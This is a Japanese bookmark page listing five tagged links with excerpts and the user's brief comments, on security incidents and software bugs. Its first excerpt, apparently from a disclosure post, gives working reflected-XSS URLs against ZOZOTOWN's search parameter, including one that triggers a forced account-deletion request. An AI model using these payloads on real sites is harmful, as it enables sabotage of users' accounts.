テストに関するimatubuのブックマーク (5)

  • ZOZOTOWNにあったXSS - Qiita

    以下のようなURLでXSSができた。 http://zozo.jp/search/?sex=kids&dstk='}}; (JavaScript); {{' 画像↑のXSSは以下のような感じでできた。 http://zozo.jp/search/?sex=kids&dstk='}};$('img').attr('src', 'https://www.google.co.jp/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png');{{' ログイン中に踏んだら強制退会できたXSS↓ http://zozo.jp/search/?sex=kids&dstk='}}; $.ajax({ type: 'GET', url: 'http://zozo.jp/_member/leave/default.html?', success:

    ZOZOTOWNにあったXSS - Qiita
    imatubu
    imatubu 2019/05/21
    これが悪用されたら、URL踏んだだけでゾゾスーツが送られてくるとかあったのだろうか
  • 8千回ボタン連打、システムに欠陥 仮想通貨の詐取事件:朝日新聞デジタル

    仮想通貨「モナコイン」を顧客から預かるサービス「Monappy(モナッピー)」(営業停止中)に昨年、サイバー攻撃を仕掛け、運営会社からモナコイン約1500万円相当(当時のレート)を詐取したなどとして、警視庁は14日、宇都宮市の少年(18)を電子計算機使用詐欺と組織的犯罪処罰法違反(犯罪収益の隠匿)の疑いで書類送検し、発表した。容疑を認めているという。 仮想通貨をめぐっては、昨年1月に「コインチェック」で約580億円相当、同9月に「ザイフ」で約70億円相当(ともに当時)など、取扱業者からの不正流出が相次ぐ。同庁によると、仮想通貨流出事件の摘発は全国で初めて。 サイバー犯罪対策課によると、少年は昨年8~9月、モナッピーの送金システムの欠陥を悪用して誤作動させ、運営会社が管理していたモナコイン約9万7千モナ(約1500万円相当)を外部の口座に送金させて詐取。大半を海外仮想通貨交換所の匿名アカウ

    8千回ボタン連打、システムに欠陥 仮想通貨の詐取事件:朝日新聞デジタル
    imatubu
    imatubu 2019/03/15
    仮想通貨のシステムバグを一般人に突かれる定期
  • 無限アラートは不正プログラムとして逮捕されるらしいので警察にゴールドバッハ予想を証明してもらおう - Qiita

    これは何? これは以下のツイートに触発されて作ったn回目のアラートダイアログで2n+2を二つの素数の和で表せるかを全探索して表せた場合もう一度アラートダイアログを表示するJavaScriptプログラムです n回目のアラートダイアログで2n+2を二つの素数の和で表せるかを全探索して表せた場合もう一度アラートダイアログを表示するみたいなプログラムを書けば警察がゴールドバッハ解いてくれるのでは — ほんまか? (@Kory__3) March 4, 2019 つまりどういうこと? 経緯 エンジニアの方ならわかると思いますが、今日(3月5日)の朝から、Twitterなどで、不正プログラムを書き込んだ疑いで女子中学生が補導され、男性2人が書類送検されるという方針だというニュースがトレンド入りし、話題になりました。(確認したら今もトレンド入りしてるようです。ある程度パーソナライズされてるらしいので全員

    無限アラートは不正プログラムとして逮捕されるらしいので警察にゴールドバッハ予想を証明してもらおう - Qiita
    imatubu
    imatubu 2019/03/06
    バグ探し発想あるある
  • 意図的にプログラムの動きをランダムにしてバグを早期発見するテクニックについて|Rui Ueyama

    プログラムを書いていると、素直に実装した結果として毎回特定の条件が満たされているけど、来それは誰も保証してないという場面に出くわすことがよくある。保証されていない偶然の動作に依存することで生じるバグというのはかなり多い。 例えば最近では、ドラゴンボールZ ドッカンバトルというゲームで、2回SQL文を実行した結果が同じ順序で並んでいるという誤った期待をしているコードがあったせいで、ガチャの確率表示がめちゃくちゃになってしまって、運営が確率操作しているのではないかという騒動が発生したことがあった [1]。データベースでは空のテーブルにデータを追加してその直後に読み返すと、データを追加した順番に結果が返ってきたりしがちなので、問題のコードはきれいなテスト環境では偶然うまく動いてしまったのだろうと思う。 上のようなバグを防ぐために最近よく使われているのは、来保証しないところをわざと壊すという方

    意図的にプログラムの動きをランダムにしてバグを早期発見するテクニックについて|Rui Ueyama
    imatubu
    imatubu 2017/12/14
    おもしろい試みではある
  • http://www.smartstyle-blog.net/entry/FaceAuthentication

    http://www.smartstyle-blog.net/entry/FaceAuthentication
    imatubu
    imatubu 2017/09/14
    家電タブで初めてまともな記事をみた
  • 1